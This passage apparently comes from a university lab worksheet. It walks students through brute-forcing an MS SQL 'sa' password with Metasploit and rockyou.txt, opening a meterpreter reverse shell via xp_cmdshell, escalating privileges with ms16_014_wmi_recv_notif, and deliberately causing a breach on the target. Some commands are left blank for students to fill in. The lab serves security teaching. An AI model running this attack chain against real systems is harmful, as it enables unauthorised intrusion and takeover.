  • 3. Type the command here Set the remote host (SQL Server) to connect, and then the Metasploit module will try passwords remotely by brute-forcing Type the command here Check the username; if you see roo, you have to change it with the correct one set pass_file /usr/share/wordlists/rockyou.txt This is the password list (dictionary) you compressed. You will use this to crack the password. set verbose false Type in this command if you don't want to see a message for all failed login attempts. run Take a screenshot of the terminal window showing the password of the sa account. Note: Take a note of this password; you will use it later on. The completion of this command will take about 80 seconds. 3. Get a shell In this part, you will try to get a shell from Windows 2008 using the xp_cmdshell procedure on MS SQL Server. xp_cmdshell is a dangerous and extended procedure that enables interaction between the MS SQL server and the operating system. You can run Windows commands from SQL server and perform operations like copying files, creating folders, and many others. In this part, you will use a Metasploit payload that exploits xp_cmdshell to create a shell. search mssql_payload Search Metasploit for possible MS SQL payloads use exploit/windows/mssql/mssql_payload This is the Metasploit payload that uses the xp_cmdshell procedure on MS SQL Server show options See the possible options for this payload. By default, the username option has already been set as “sa”. Type the command here Did you see that the RHOSTS parameter is blank? Set it as Windows 2008 server. RPORT has already been set as 1433. Type the command here Set the password of the sa account you cracked in the previous part set payload windows/x64/meterpreter/reverse_tcp You have to set the payload option, although it has not been shown in the options list. This is a global option that applies mssql_payload exploit. Note that mssql_payload uses the xp_cmdshell procedure; however, it needs a mechanism to handle the MS SQL server traffic. This is similar to the analog RC car and RC remote control; remember from the Project-1. Type the command here You have to assign the local counterpart of the host. set lport 443 You have to assign the local counterpart of the port number.
  • 4. run or exploit You should be getting a shell after running the exploit. 4. Confirm that the shell is low-privileged Now try some commands to check your privilege level on the shell. Commands Notes shell Switch to Windows 2008 native shell whoami See the currently logged-on user name. It is probably a low-privileged shell. Let’s try doing something that requires privileges. Type the command here Try to add a user account from the command line. Take a screenshot of the terminal window showing the result. Exit Exit from the Window 2008 shell and return to meterpreter shell 5. Get a high-privileged shell In this part, you will use the exploit suggester module to find some exploits for privilege escalation, and then use one of these exploits. background Don’t forget to note the id of the session search suggester This command is to search for the keyword “suggester” and find the correct name of the suggester module.set Type the command here Type in the correct command show options Type the command here Write the correct command run or exploit Run exploit suggester, so that it will suggest some exploits to run on the low-privileged shell to get a high-privileged shell. Type the command here Use ms16_014_wmi_recv_notif. Type in the correct command show options set session # The same session ID should put here as the one you chose for the exploit suggester. Remember, you are trying the exploits suggested by the local_exploit_suggester. run or exploit After running the exploit, you should see the message "Exploit completed, but no session was created." show options This time you will see the options of the payload (reverse_shell_tcp) Type the command here Set the first option of the payload Type the command here Set the second option of the payload option run or exploit You should be getting a shell after running the exploit. You will see a Windows shell instead of a meterpreter shell. (Press enter once)
  • 5. 6. Confirm that the shell is high-privileged Now check if you have the privilege to perform the dangerous actions. whoami Take a screenshot of the terminal window showing the username. 7. Gave rise to an information security breach Type the command(s) here Did something that will cause loss of confidentiality, integrity, or availability on the target system. Provide the details. Take screenshots. Please perform anything other than you did in the Project-2. (Don’t create a user account) Weekly Learning and Reflection In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.